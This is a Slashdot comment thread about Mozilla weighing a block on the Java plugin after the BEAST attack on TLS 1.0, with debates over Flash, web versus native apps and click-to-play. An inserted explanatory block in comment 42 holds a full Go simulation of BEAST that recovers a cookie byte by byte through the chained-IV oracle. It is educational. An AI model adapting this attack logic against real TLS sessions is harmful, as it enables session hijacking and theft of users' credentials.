    7. Re:Totally overblown. by sgt+scrub · · Score: 1

      It turns out you don't need anything but to request the encrypted cookie from the browser. If you can decrypt the cookie with data from an exchange you just request a peek at the cookie, decrypt it, ...profit. A plugin would be an easy way to grab information for decryption though. As to your reference to Chen, I'm sure he would agree that a compromised plugin shouldn't mean your data is at any greater risk than adding a user to a machine.

      --
      Having to work for a living is the root of all evil.
    8. Re:Totally overblown. by sgt+scrub · · Score: 1

      You can request a browser to send you any cookie you like. A plugin or applet is not necessary. Access to the information needed to decrypt the cookie requires the plugin/applet/MIM attack.

      --
      Having to work for a living is the root of all evil.
  4. Won't help by ArsenneLupin · · Score: 2
    Couldn't the same exploit be run within a plain (hidden) auto-refresh frame containing an tag pointing to the victim server?

    Indeed, image doesn't enforce "same origin" either, and the server (of the frame) can still introduce the needed padding into the URL...

    1. Re:Won't help by Tridus · · Score: 1

      Doesn't that pretty much perfectly describe everything Mozilla's been doing in the last 6 months?

      --
      -- "So they told me that using the download page to download something was not something they anticipated." - Bill Gates
    2. Re:Won't help by jlebar · · Score: 2

      I haven't read up too closely on this, but I think traffic going through Firefox itself is not vulnerable. See http://blog.mozilla.com/security/2011/09/27/attack-against-tls-protected-communications/.

    3. Re:Won't help by BattleApple · · Score: 3

      Just like if you handcuff everyone to their beds, there will be no more crime.

      There's still a chance some of them would rip off that label on their mattress.

    4. Re:Won't help by gilleain · · Score: 1

      Quickly, we need to block tags too! As a matter of fact, shut down the whole browsing feature! It's just a liability anyway.

      Unplug the computer, it's the only way to be sure!

    5. Re:Won't help by briansmith · · Score: 1

      There may indeed be other vectors for an attack that use built-in browser features. However, some characteristics of how the browser manages connections and how it formats HTTP requests would defeat most (all, as far as we know at this time) variations of the attack that use built-in browser features.

    6. Re:Won't help by mzs · · Score: 1

      SOP (same origin policy), the paypal.com cookies will not be sent to evill.com.

  5. That is a monstrous solution by mrflash818 · · Score: 1

    ...and will further put a stake into the heart of Java in the web.

    --
    Uh, Linux geek since 1999.
    1. Re:That is a monstrous solution by Anonymous Coward · · Score: 1

      quick, someone find a way to exploit it with flash and silverlight!

    2. Re:That is a monstrous solution by roman_mir · · Score: 1

      Actually I think it would put a stake into Mozilla based browsers, because if they block Java plug in today, how do you know what they will do to the browser tomorrow?

      AFAIC if they go this road, they are dead as a browser.

  6. Stop trying to make the browser more than it is. by Anonymous Coward · · Score: 2, Interesting

    Web browsers are good for viewing static documents, especially ones that link to other static documents.

    Time and time and time again, however, they have been shown to be horrible at hosting more complex applications and interactive functionality.

    It doesn't matter which embeddable application technology we consider, they are all rife with security flaws. Java applets, ActiveX controls, JavaScript, Flash, and browser plugins (like PDF viewers) have all suffered from numerous security problems.

    If you need to provide your users with application-like behavior, then just write a native application!

    Browsers are not operating systems. They are not good at hosting applications in a secure manner. Even after two decades of trying, they still aren't suitable environments for hosting applications. It's looking like they never will be, either.

  7. Re:Stop trying to make the browser more than it is by Anonymous Coward · · Score: 1

    You seem to think that OSes have fared any better. The only reason that exploits come primarily through the browser is because it is far simpler to get a user to run a website/webapp than to download and run a native application. Remove the capability of the browser and force the user's hand into running native applications (and attackers into exploiting them) to do the things he/she wants and your idea of the mighty, secure OS will quickly evaporate.

  8. Re:Stop trying to make the browser more than it is by Lisandro · · Score: 2

    You know, the issue here is not the browser. It's the HTTP protocol - it was simply designed for nothing else but static content. The number of kludges and patches you need to implement basic session handling and interactivity is getting ridiculous. Do we even have an RFC for cookies, for example?

  9. Re:Stop trying to make the browser more than it is by dingen · · Score: 2

    If you need to provide your users with application-like behavior, then just write a native application!

    When there was just one popular platform to run these native applications on, this was a fine solution. I mean back when everybody did everything in Windows. But nowadays, people are using all sorts of systems. Not just Mac OS X and Linux on the desktop, but iOS, Android, Windows Phone, BlackberryOS and Symbian on mobile devices as well. So "just write a native application" actually becomes "write a native application and then port it to 7 other platforms". That's when a web application suddenly starts to look like a viable alternative.

    --
    Pretty good is actually pretty bad.
  10. Less radical solution = better by clorkster · · Score: 1

    I have convinced several non-technical people to stop using IE altogether when I could conclusively show them that there was no practical way to disable the Java plugin... Choir preaching over.

    While Firefox and Chrome allow practical and real disabling of the Java functionality in their browsers, only Chrome offers really practical functionality for plugins (yes, I'm aware there are several other browsers out there that people deeply love; however, testing in the above three tends to give proper rendering on all for web elements, so I don't plan on expanding my repertoire).

    In Chrome, if the Java (or Windows Media Player, etc.) plugin is requested by a page, users are prompted to give domain specific permanent access to the plugin or allow it for one-time use. As ridiculously problematic as Java is from a security perspective, it is also extremely useful for enterprise-level products that use it exclusively for powerful web-based back ends (Cisco firewalls for one).

    1. Re:Less radical solution = better by clorkster · · Score: 1

      ... or pre-install/integrate NoScript.

    2. Re:Less radical solution = better by Stormy+Dragon · · Score: 1

      Disabling Java in IE9:

      Tools->Manage Addons->Click Java Plugin->Select Disable from Menu

    3. Re:Less radical solution = better by clorkster · · Score: 1

      It probably made you feel warm and fuzzy to do so. However, if you now go to a site that is java enabled, you will see that you just accomplished nothing by your efforts. Java is still woefully enabled.

    4. Re:Less radical solution = better by maxume · · Score: 1

      So what about "Manage Add Ons"-> "Disable" does not work?

      --
      Nerd rage is the funniest rage.
    5. Re:Less radical solution = better by clorkster · · Score: 1

      So what about "Manage Add Ons"-> "Disable" does not work?

      Everything. I have been continuously testing that fact since a co-worker was the victim of a java exploit. Whether it's disabled or not, IE loads Java exactly the same.

    6. Re:Less radical solution = better by maxume · · Score: 1

      If I select show "All add-ons" and disable all 4 Sun entries, when I visit here:

      http://futureboy.us/frinkdocs/FrinkApplet.html

      I get an alert that an add-on is disabled.

      (I restarted after disabling them, just to be sure).

      --
      Nerd rage is the funniest rage.
    7. Re:Less radical solution = better by clorkster · · Score: 1

      Not sure if it's a security setting, but I can't get that site to load the plugin in IE, period. On my corporate intranet, we have a back end remote management item for all the computers on the domain that is Java-based. No matter how I set the add-on settings for Java, the applet loads right up. Restart included.

    8. Re:Less radical solution = better by mzs · · Score: 1

      This is a MITM attack, they inject the jar on a site that you have whitelisted, and now they have your session cookies for paypal or what not.

  11. Re:Stop trying to make the browser more than it is by Lisandro · · Score: 1

    Nowadays you have a lot of options to ease code porting - including the almighty "write once, run everywhere" Java. Lately I've been working a lot with Python and I'm amazed at how painless it was to port apps between Windows and *nix (i.e., no pain at all).

  12. Re:Stop trying to make the browser more than it is by Pieroxy · · Score: 1

    You know, the issue here is not the browser. It's the HTTP protocol - it was simply designed for nothing else but static content. The number of kludges and patches you need to implement basic session handling and interactivity is getting ridiculous. Do we even have an RFC for cookies, for example?

    The only flaw with HTTP is that it is stateless. It is also its greatest strength.

    I'd hardly call cookies 'number of kludges and patches' though. Ah, here is the RFC: http://www.ietf.org/rfc/rfc2109.txt

  13. Re:Stop trying to make the browser more than it is by Chibi+Merrow · · Score: 1

    Okay. Now try porting it to iOS. Or ChromeOS. Or WebOS. Or Blackberry.

    I'm gonna bet WP7 and Android wouldn't be painless, either. And good luck getting people to install Python on their Windows box before they can even try your app.

    --
    Maxim: People cannot follow directions.
    Increases in truth directly with the length of time spent explaining them
  14. Mozilla Craziness by Anonymous Coward · · Score: 5, Insightful

    What is with all of the over-the-top craziness coming out of Mozilla recently? Oracle needs to address the bug, but maybe Firefox could handle it in a more graceful manner than disabling the plugin entirely.

    Mozilla, you used to be one of the darlings of open source, now you're turning into a crazy cat lady.

    - remove version numbers.
    - rapid release schedule breaks add-ons.
    - gave the middle finger to enterprise users.
    - removed the URL bar.

    1. Re:Mozilla Craziness by Anonymous Coward · · Score: 1

      It's the same thing that's with the over-the-top trolling on Slashdot that appears in any article remotely related to Mozilla:

      Article Title: Microsoft slightly changes the alpha blending of the Internet Explorer Icon.

      +5 Insightful post:

      Well I stopped using Firefox because:
      - remove version numbers.
      - rapid release schedule breaks add-ons.
      - gave the middle finger to enterprise users.
      - removed the URL bar.

      It's relevant because someone said something about an Internet technology. Firefox is an Internet technology... clearly it must be brought up that my butt hurts because of Firefox. It doesn't matter that the same drivel and refutations have shown up thousands of times. We have moderators who will +5 it rather than mark it as OT or Trolling.

      For the love of god... just STFU you fucking 9-y-o. Try 4chan or something.

    2. Re:Mozilla Craziness by thegarbz · · Score: 1

      - removed the URL bar.

      What are you smoking?

      Sincerely
      The man who types www.slashdot.org into the bar at the top of Firefox to get to this page.

    3. Re:Mozilla Craziness by dgun · · Score: 1

      I agree. And I hate to see this happen to Firefox. They seem so eager to appear innovative and edgy, yet haven't really done anything interesting in years.

      --
      FAQs are evil.
  15. Re:Stop trying to make the browser more than it is by thegarbz · · Score: 1

    Web browsers are good for viewing static documents, especially ones that link to other static documents.

    Yep, but in the past 10 years they've gotten damn good at other things too beside hosting a page with the blink tag. Frankly I don't miss the days of a static web page.

    It doesn't matter which embeddable application technology we consider, they are all rife with security flaws. Java applets, ActiveX controls, JavaScript, Flash, and browser plugins (like PDF viewers) have all suffered from numerous security problems.

    The same could be said for nearly every application written in any other language. Security is something that needs to be applied from the ground up whether you're designing a database front end designed to run in a web browser or writing a simple native program in C.

    Even after two decades of trying, they still aren't suitable environments for hosting applications. It's looking like they never will be, either.

    Two decades of trying? Just when do you think Web2.0 actually took off? The proliferation of the browser as an end user environment has really only been popular for less than a decade unless you count the HTML tag that found its way onto every site during the dotcom bubble an application.

    You said the environment isn't suitable; I say I'd rather take it with its standard OS type model of find flaw, fix flaw, rinse, repeat than go back to a world of having to find a different bloody native application on every different operating system to do essentially the same function, often over a lovely proprietary protocol.

  16. Re:Stop trying to make the browser more than it is by Lisandro · · Score: 1

    Thanks for the RFC reference. Cookies are perhaps the most painless aspect of "modern" HTTP dev work; I was aiming more at atrocities like AJAX.

  17. Re:Stop trying to make the browser more than it is by ceoyoyo · · Score: 1

    That IS the problem with browsers. It's like allowing executable code in a data document - it's something that SHOULD be safe but isn't.

  18. Further decrease market share by Fujisawa+Sensei · · Score: 3

    Way to further decrease market share. First start fucking with the version numbering. Now blacklist Java.

    Keep taking the express elevator to the bottom, just like Netscape did.

    --
    If someone is passing you on the right, you are an asshole for driving in the wrong lane.
    1. Re:Further decrease market share by j-stroy · · Score: 1

      The constant forced upgrade cycles and confusing versioning in Firefox have left me with an unpleasantly different experience every time I upgrade. Not to mention GUI redesigns and plug-in fails. So I don't upgrade.. and then when I do, the upgrades fail and I can't roll back without a re-install from what I can tell. The bitch is: it never gets stable, or shuts up about it.
      In fact I've quit using it altogether for the first time since Firefox was released. Now I use Safari wtf.

  19. Umm... Flash? by Tridus · · Score: 4, Insightful

    So they want to block Java over what is a difficult to execute attack that has some serious requirements to even use... but they continue to allow Flash with its critical flaw of the week that's being actively exploited?

    Is this a joke? Flash is the single largest attack vector on the entire fucking Internet.

    --
    -- "So they told me that using the download page to download something was not something they anticipated." - Bill Gates
    1. Re:Umm... Flash? by supersloshy · · Score: 1

      Java isn't far behind, though, and it's rarely used for anything besides Runescape and the occasional application that was made before Flash was big. The danger here is that people have Java installed as a web plugin when it really, really doesn't need to be in most circumstances.

      --
      "Our country is not nearly so overrun with the bigoted as it is overrun with the broadminded." -Archbishop Fulton Sheen
    2. Re:Umm... Flash? by cstdenis · · Score: 1

      People use Flash all the time. HTML 5 is on the way, but until its issues (codecs, full screen, ads) are worked out Flash is still the only common option for video on the web.

      Java, on the other hand, nobody cares about. Other than a few specialty applications or very old websites, Java applets have long been dead.

      Sun's early poor design decisions and the resulting horrible performance (nobody likes their whole browser freezing for 30 seconds while an applet loads) killed it long ago. Modern Java has somewhat fixed those problems, but it's too little too late; everyone has long since moved on to Flash. Macromedia/Adobe may not know much about security, but they managed to get passable performance out of Flash back when it mattered.

      --
      1984 was not supposed to be an instruction manual.
    3. Re:Umm... Flash? by Anonymous Coward · · Score: 1

      The thing is, this exploit isn't a Java exploit. It's funny that they used Java because there are a lot of better ways that don't require external plugins. Injecting <script> or <img> tags for instance do not have restrictions on same origin.

    4. Re:Umm... Flash? by dshk · · Score: 1

      We are a small casual game site only, but we have a regular user base of several hundred thousand, and we are using Java applets. No, it is not Runescape.

      In the last ten years I only remember about two or three really critical Java exploits. Please show me a similar or even much simpler piece of software with a security track record better than Java's.

      I would add that this is a TLS vulnerability, it has almost nothing to do with Java. The exploit was written in Java, because it was comfortable. The authors mention on their YouTube video, that they could equally well use Javascript. I assume that they could have used Flash too.

    5. Re:Umm... Flash? by supersloshy · · Score: 1

      That's true. Thanks for the response :)

      --
      "Our country is not nearly so overrun with the bigoted as it is overrun with the broadminded." -Archbishop Fulton Sheen
    6. Re:Umm... Flash? by dveditz · · Score: 2

      If there were "better" ways that didn't require a plugin they would have demoed that. Maybe there are such ways, but not through simple <script> or <img> tags. In some ways I wish that is what they used: we could have fixed that ourselves rather than being at the mercy of plugin vendors.

  20. Spyware, too by bigtrike · · Score: 1

    Spyware/malware used to be much more of a pain because you had to download and trust a large number of applications to do much with your computer. Many users' needs are sandboxed into webapps these days, preventing a lot of issues.

  21. Re:Stop trying to make the browser more than it is by ceoyoyo · · Score: 1

    Meh. If your application is primarily presenting a UI then a web app isn't such a bad solution. For applications that actually do something, most of the work is behind the scenes. If it's Desktop only write it in Python or the like and you've suddenly got the entire desktop/notebook market finished. If you want it to run on a phone or tablet (and it SHOULDN'T run on both a phone and a desktop) then write it in C and slap Android and iOS UIs on it.

  22. Re:Stop trying to make the browser more than it is by Lisandro · · Score: 1

    PyObjC. It's completely doable.

    And even then, it is not the desired target. If you use the right tools for each platform it gets way easier; Java paves an easy road for porting between desktops, Android, iOS, Chrome and Blackberry, for example.

  23. Microsoft has ended support for J# by tepples · · Score: 1

    A Java application does not run on Windows Phone 7. Only web applications and applications written in verifiably type-safe .NET languages work on Windows Phone 7, and Microsoft has ended support for J# as far as I know. Python doesn't work on a lot of these more locked-down platforms either: it and other DLR languages require Reflection.Emit, which isn't present on a lot of the minimal CLRs. Nor will Java or Python help you get Sony or Nintendo to approve your application for execution on a PSP, PS3, PSVita, DSi, Wii, or 3DS, all of which come with a web browser or have one available for download at no charge.

    1. Re:Microsoft has ended support for J# by Lisandro · · Score: 1

      Agreed, but then again, there's no magical solution for porting. There are great tools that ease the process though, in pretty much any platform and technology you'd like.

      The fact that porting requires work shouldn't be an excuse to turn web browsers into fancy VMs.

    2. Re:Microsoft has ended support for J# by dingen · · Score: 1

      The fact that porting requires work shouldn't be an excuse to turn web browsers into fancy VMs.

      Why not? Isn't it about getting your application to as many people as possible, with the least amount of effort?

      --
      Pretty good is actually pretty bad.
  24. Re:Stop trying to make the browser more than it is by tepples · · Score: 1

    If you need to provide your users with application-like behavior, then just write a native application!

    Give me a solid workaround for each of these problems and I'll agree with you:

    • Unlike native applications made for Windows, web applications work on Macintosh computers and PCs running Linux. (Workaround: Qt)
    • Unlike native applications made for PCs, web applications work on video game consoles and smartphones. (Workaround: ?)
    • Unlike native applications, web applications can be used by limited users who have no privileges to install applications on a machine. (Workaround: ?)
  25. Not blocked, but click to play by kangsterizer · · Score: 5, Insightful

    Quoting decoder from the security team:

    "It should be "click to play" by default, which means you have to click on the applet for it to be activated and loaded. "Disabled" might have been the wrong term here, but until you click the applet, nothing can happen."

    That's what Chrome does also. Then again, in theory Flash should also be click to play. Except Flash is used everywhere and it's going to piss people off, so it's not click to play in Chrome either. In fact, all plugins should be click to play with a white list of auto play sites that the user can configure. Yeah, NoScript.

    Still, I'd prefer default click to play in java.

    1. Re:Not blocked, but click to play by sgt+scrub · · Score: 1

      A large portion of their user base installs a flash blocker that allows them to decide if they want to view a flash file or not. I don't get why they don't pick up on these things. Having the functionality in the browser is great. Having the ability to make a decision is even better.

      --
      Having to work for a living is the root of all evil.
    2. Re:Not blocked, but click to play by kangsterizer · · Score: 1

      I suppose it's something like "if it's technical it'll confuse people"
      "also if it's technical, tech people will install the addon and get the feature so it's ok"

      that's probably for the very reason I cited above, click to play Flash would alienate most users. click to play Java is ok, but that's just because there aren't many Java applets, nothing else!

      so in the end it's a very delicate choice

    3. Re:Not blocked, but click to play by KiloByte · · Score: 1

      This is what Flashblock does, and I don't imagine browsing without it if you need flash.

      --
      The creatures outside looked from Alt-Right to Antifa; but already it was impossible to say which was which.
    4. Re:Not blocked, but click to play by bill_mcgonigle · · Score: 1

      I don't get why they don't pick up on these things.

      They have all the metrics from addons.mozilla.org. They choose to ignore the wisdom of their masses and try to centrally plan the direction browsers should take. See TFS for how well this works out. See also Firefox v183.

      --
      My God, it's Full of Source!
      OUTSIDE_IP=$(dig +short my.ip @outsideip.net)
    5. Re:Not blocked, but click to play by OdinOdin_ · · Score: 1

      Yes, let's have "click to play" for all plugins; that would be great. A user definable option, plugin by plugin.

      Also, when there are 1 or more items in a web page that require click to play, let's also have a user preference option for a drop-down bar to appear (the bar that sometimes appears due to popup blocking and file downloading at the top of the main web-page area).

      This feature would be a great addition to Firefox and would show no discrimination towards Java in particular; then I could disable Flash by default as well!

    6. Re:Not blocked, but click to play by sgt+scrub · · Score: 1

      See also Firefox v183

      Is it 2012 already?

      --
      Having to work for a living is the root of all evil.
    7. Re:Not blocked, but click to play by pterry · · Score: 1

      In fact, all plugins should be click to play with a white list of auto play sites that the user can configure.

      That's exactly what Chrome does for me since I enabled it. Go to chrome://flags/ and enable Click to play, then go to chrome://settings/content and set Plug-ins to Click to Play. There's also a blacklist / whitelist you can configure. Why this option is "experimental" I have no idea.

  26. Re:Stop trying to make the browser more than it is by Pieroxy · · Score: 1

    Ajax conforms to the HTTP protocol pretty much like everything else. It is an http request sent by the browser basically indistinguishable from another regular http request to get an image or an html file. Nothing was done in the HTTP protocol for AJAX. What are you talking about exactly?

  27. Re:Stop trying to make the browser more than it is by dingen · · Score: 1

    WebSocket is developed to shine where HTTP fails. It's not yet ready for the masses, but Firefox 4, Opera, Chrome and Safari already have some support. WebSocket will make Ajax and polling in general a thing of the past, enabling even more application-like behaviour in your browser.

    --
    Pretty good is actually pretty bad.
  28. The first applet is slower by tepples · · Score: 2

    Java is slow for the first applet you view in a browser session. After that, the important class libraries are already in RAM, and further applets load just as fast as, say, SWF objects.

    1. Re:The first applet is slower by Lisandro · · Score: 1

      Which means that Java is no longer slow by then. Only the rest of your system :)

  29. Re:Stop trying to make the browser more than it is by maxume · · Score: 1

    You can bundle a python interpreter and app up so that installation and execution are the same as any other app.

    Makes for a larger install package, but that's about it.

    --
    Nerd rage is the funniest rage.
  30. How to prove one has the smarts to know better? by tepples · · Score: 1

    we have to make sure there are safeguards in place like [...] maybe requiring approval for plugin installation from someone with the smarts to know better than to install [a trojan disguised as a video player component]

    So how would a more knowledgeable PC owner prove he has "the smarts to know better" in order to approve a plugin installation?

    1. Re:How to prove one has the smarts to know better? by djdanlib · · Score: 1

      That's the million dollar question, isn't it?

      Every PC owner believes they are entitled to do as they please with their PC. More people think they are knowledgeable than actually are knowledgeable, and I'm not saying I'm exempt either.

      Same with car owners, except car owners need to get inspected and will get pulled over if they have something truly obviously broken. Why? It affects other people. Same with PC malware - it affects other people! Your PC might be used to buy/trade my identity, attack my company's networks, or spam my email, without your knowledge. So I really am starting to lean towards having an "Internet drivers' license" and regulating the equipment...

    2. Re:How to prove one has the smarts to know better? by tepples · · Score: 1

      What actions would require the advanced privileges that come with such a "driver's license"? Would you restrict the ability to install software not digitally signed by an accredited business? Would you restrict the ability to compile software? How would that affect high school students doing their homework for an introduction to programming class?

    3. Re:How to prove one has the smarts to know better? by djdanlib · · Score: 1

      This comes up every now and again, but it's totally moot because things are too far gone. If they'd implemented in the early 90's, then it would be possible. The existing userbase is just too big now. So, awareness needs to be promoted more than my futile agenda of mandatory proving-that-you-can-be-a-responsible-user.

      Digital signing seems to get compromised regularly, so that's out. I'm not a fan of censorship anyway, so let's not give regulators that kind of power over what you can and can't have - it needs to be a switch. You can put this PC online, it passes the safety and integrity check (no bots are opening ports), and you can go online, you have the license.

      I'd say that the license would only allow you access to the Internet. Without it, you wouldn't have access. You'd still be free to do as you please except that you couldn't go online. Just like private property - I believe you should be able to drive a tractor or truck around on your own farm, no matter what, as long as you accept that there are risks to doing that with equipment that rarely or never gets a full inspection.

      Restricting compilation wouldn't be good, neither would restricting interpreted bytecode. Again, that is a censorship issue. How would you even begin to restrict it? Based upon some patterns in the code? Require a license? But then what about javascript, vbscript, shell scripts? Java, .NET? Flash? It's not really feasible.

      Then you get into dicey territory. What happens if someone sneaks on, or otherwise does something that's supposed to be restricted by not having the license? Is there a penalty? Is it a crime? I don't know.

      I haven't thought it all the way through yet, I guess, but I'm satisfied just to promote responsibility.

  31. Re:Stop trying to make the browser more than it is by w_dragon · · Score: 1

    He's probably talking about things like how the browser/web server create a new TCP session for each and every AJAX request, even if they're going to happen every few seconds for as long as you're on a page. Google gets around this by setting some silly-long keep-alive on the TCP connection for the original page request on pages like gmail so the first few AJAX requests at least don't take the extra overhead.

  32. No ETA for a fix by tgeek · · Score: 1

    I guess that means they haven't decided if it should go in the version 8 due after lunch, version 9 tomorrow morning, or version X next Tuesday . . .

  33. SSL man in the middle by tepples · · Score: 2

    The attacker must be a man-in-the-middle

    The server's ISP is a man-in-the-middle. The operator of a national firewall is a man-in-the-middle. This is not unlike what Perspectives calls the "Lserver attack".

    1. Re:SSL man in the middle by Astatine · · Score: 1

      ...anyone sharing a public WiFi with you can be a man-in-the-middle...

  34. Re:Stop trying to make the browser more than it is by Lisandro · · Score: 1

    I'm talking about the fact that you need to execute an HTML call in a scripting language inside the same browser to retrieve HTML content, which most of the time requires a framework tool in order to be reprocessed and inserted into the main page's DOM. It's a (very ugly) workaround for the fact that HTML was designed as a one-way method of communication - static content.

  35. Re:Stop trying to make the browser more than it is by Pieroxy · · Score: 1

    But this is just a lack of optimization on the part of the browsers... It'll come in time. But it is not an "atrocity" like the GP was saying...

  36. If it's about mistuned servers by tepples · · Score: 1

    So it appears someone's core complaint about AJAX is that a lot of AJAX sites are run on mistuned servers whose default keep-alive time is too short for AJAX. If the problem is with the TCP keep-alive mechanism, wouldn't a connection-oriented protocol have exactly the same problem?

  37. Firefox 7 delayed by RStonR · · Score: 1
  38. Application logic in which language? by tepples · · Score: 1

    So do the sensible thing and have several native implementations.

    Ideally, these native implementations should be able to share the same application logic, just with a different front-end per platform. This way, if I fix a defect in the application logic, it's fixed across all ports. This is one advantage of separating model and view layers. But apart from JavaScript in a web browser, is there a single programming language that can be used on Windows, Mac OS X, desktop Linux, iOS, Android, WebOS, ChromeOS, BlackBerry OS, and Windows Phone 7, in which to write this application logic?

  39. Re:Used for Games, apps, and several websites by gilleain · · Score: 1

    Nope, pretty much all board game apps require Java, many bank websites, etc require this. I'm not saying they should, just saying they do.

    That may change in the near future. In my area, applets are often used for simple chemical structure editors, but there are some commercial and free/open-source javascript solutions for this. Even 3D molecular viewers, like twirlymol:

    http://baoilleach.blogspot.com/2009/01/twistymol-is-dead-long-live-twirlymol.html

    There are many advantages, such as better page integration, no startup time, no "install java" popup, etc.

  40. Re:Stop trying to make the browser more than it is by cavreader · · Score: 1

    Today's computing ecosystem is still too volatile to guarantee perfect security, whether you build from the ground up or apply endless patches and updates. Look at the number of permutations of Operating Systems, OS Versions, OS Security Patch Levels, OS Bug Patch Levels, Hardware platforms, and custom Applications. It's amazing anything works or is even half way secure, especially when you introduce user actions into the mix.

  41. Re:Stop trying to make the browser more than it is by Lisandro · · Score: 1

    No. The parent poster raises a nice point regarding TCP sockets and how they're handled to provide "instant" UI response. Google does it beautifully, but it requires a crapload of work and testing in order to get it right, not to mention it basically (again!) abuses a TCP feature intended for a completely different thing.

  42. The problem is not Java by nweaver · · Score: 4, Informative

    The problem is NOT java, the problem is SSL/TLS. Java was just the vector which was used to exploit this, and disabling Java doesn't disable the real problem, especially since Mozilla refuses to support TLS 1.1.

    It's also unclear in the press how the Java same origin bypass worked for this test: Was it click to install or a real flaw? As a tool author (Netalyzr [berkeley.edu]), being able to bypass same origin without a signature dialog would be a big deal in improving the quality of our tool.

    --
    Test your net with Netalyzr
    1. Re:The problem is not Java by Bovius · · Score: 2

      The problem is NOT java, the problem is SSL/TLS. Java was just the vector which was used to exploit this, and disabling Java doesn't disable the real problem, especially since Mozilla refuses to support TLS 1.1.

      What really shocks me is that this is the lead developers of Firefox recommending this solution. I just kind of assumed they would address the SSL/TLS issue instead of the particular implementation flavor the researchers chose.

    2. Re:The problem is not Java by bill_mcgonigle · · Score: 2

      Quick, somebody code up this exploit in Flash so Mozilla is forced to make the proper fixes, instead of blaming the kid they don't like.

      --
      My God, it's Full of Source!
      OUTSIDE_IP=$(dig +short my.ip @outsideip.net)
    3. Re:The problem is not Java by Anonymous Coward · · Score: 1

      It doesn't surprise me. Why go to the trouble of implementing TLS 1.1 and TLS 1.2 when you can force someone else to fix the problem with their software so that you can focus your efforts somewhere else (despite the fact that Java only presents one vector, the discoverer of the flaw has even pointed that out)? In Firefox's case, they are short staffed when it comes to implementing TLS, because all of their staff is tied up in making changes to the UI (excuse me, UX) and the rapid release.

    4. Re:The problem is not Java by thue · · Score: 1

      According to the article:

      "For Friday's implementation of BEAST to work, Duong and Rizzo had to subvert a safety mechanism built into the web known as the same-origin policy, which dictates that data set by one internet domain can't be read or modified by a different address."

      "The researchers settled on a Java applet as their means to bypass SOP, leading Firefox developers to discuss blocking the framework in a future version of the browser."

      So it sounds like there are two security bugs. One in TLS, and one in Java.

    5. Re:The problem is not Java by briansmith · · Score: 1

      No matter what we do to the browser's TLS implementation, this attack would still be possible via Java, because Java has its own TLS implementation.

      We are already working on proactively mitigating any improvements on the BEAST attack that could be made to work using native browser features that would be affected by changes to our TLS implementation. But, right now, there are no known ways to implement the attack using built-in browser features.

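The thread above keeps saying "the problem is TLS 1.0, not Java". To show concretely what that means, here is an added example (written for this page, not code from the researchers, Mozilla or anyone quoted here) that models the one TLS 1.0 CBC property BEAST depends on: each record's IV is the previous record's last ciphertext block, which anyone on the wire can see before the next record is encrypted. The Java applet's role in the real attack was only to make the browser send attacker-chosen records on the victim's TLS session; here that is modelled as a direct call to the session's encrypt routine. The key, initial IV and cookie value are constructed for the demo, and MAC and TLS padding are omitted because they do not affect the chaining. The example goes a step beyond the comment text and carries the block-boundary trick through to recover the cookie byte by byte.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"fmt"
)

const blockSize = 16

// tls10CBC models TLS 1.0 record encryption: CBC where the IV of each record
// is the last ciphertext block of the previous record, so the next IV is
// public before it is used. TLS 1.1+ sends a fresh random IV per record.
type tls10CBC struct {
	block cipher.Block
	last  []byte // last ciphertext block on the wire == next record's IV
}

func newTLS10CBC(key, iv []byte) *tls10CBC {
	b, err := aes.NewCipher(key)
	if err != nil {
		panic(err)
	}
	return &tls10CBC{block: b, last: append([]byte(nil), iv...)}
}

// encrypt one record; pt must be a whole number of blocks (MAC and TLS
// padding omitted, they do not change the chaining that matters here).
func (s *tls10CBC) encrypt(pt []byte) []byte {
	ct := make([]byte, len(pt))
	cipher.NewCBCEncrypter(s.block, s.last).CryptBlocks(ct, pt)
	s.last = append([]byte(nil), ct[len(ct)-blockSize:]...)
	return ct
}

func (s *tls10CBC) nextIV() []byte { return s.last }

func xor3(a, b, c []byte) []byte {
	out := make([]byte, blockSize)
	for i := range out {
		out[i] = a[i] ^ b[i] ^ c[i]
	}
	return out
}

// guessBlock is the BEAST oracle. The target block is C[i] = E(P[i] ^ C[i-1]).
// The attacker makes the victim send X = guess ^ C[i-1] ^ IV as the next
// record; the wire then carries E(X ^ IV) = E(guess ^ C[i-1]), which equals
// C[i] exactly when guess == P[i]. One chosen record tests one block guess.
func guessBlock(s *tls10CBC, prev, target, guess []byte) bool {
	return bytes.Equal(s.encrypt(xor3(guess, prev, s.nextIV())), target)
}

// victim is the browser side: a request made of an attacker-chosen prefix
// (the URL path in BEAST) followed by a header carrying the secret cookie.
// Zero padding stands in for TLS padding.
func victim(s *tls10CBC, prefix, secret []byte) []byte {
	pt := append(append(append([]byte(nil), prefix...), "Cookie: sid="...), secret...)
	for len(pt)%blockSize != 0 {
		pt = append(pt, 0)
	}
	return s.encrypt(pt)
}

// recoverSecret recovers n bytes of the cookie one at a time. For byte k it
// picks a prefix length so that one block holds 15 bytes the attacker already
// knows followed by secret[k], then tries all 256 values of that last byte.
func recoverSecret(s *tls10CBC, secret []byte, n int) []byte {
	const header = "Cookie: sid="
	recovered := []byte{}
	for k := 0; k < n; k++ {
		// block boundary right after secret[k], and at least 32 bytes so a
		// preceding ciphertext block exists
		l := (blockSize-(len(header)+k+1)%blockSize)%blockSize + blockSize
		prefix := bytes.Repeat([]byte("A"), l)
		ct := victim(s, prefix, secret)
		t := (l+len(header)+k+1)/blockSize - 1 // index of the target block
		prev := ct[(t-1)*blockSize : t*blockSize]
		target := ct[t*blockSize : (t+1)*blockSize]
		known := append(append(append([]byte(nil), prefix...), header...), recovered...)
		known15 := known[t*blockSize : t*blockSize+15]
		found := false
		for g := 0; g < 256; g++ {
			guess := append(append([]byte(nil), known15...), byte(g))
			if guessBlock(s, prev, target, guess) {
				recovered = append(recovered, byte(g))
				found = true
				break
			}
		}
		if !found {
			break
		}
	}
	return recovered
}

func main() {
	key := []byte("0123456789abcdef") // constructed demo key
	iv := []byte("fedcba9876543210")  // constructed initial IV
	secret := []byte("s3cr3tC00kie")  // constructed cookie value
	s := newTLS10CBC(key, iv)
	fmt.Printf("recovered: %q\n", recoverSecret(s, secret, len(secret)))
}
```

Every guess costs one encrypted record, so a byte falls in at most 256 requests and the whole cookie in a few thousand, which is why the demo in the story took minutes rather than days. Nothing in the loop depends on which plugin or script sent the records; a per-record random IV (TLS 1.1) or a non-CBC cipher removes the oracle, and blocking one plugin does not.
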
  43. Re:Stop trying to make the browser more than it is by Pieroxy · · Score: 1

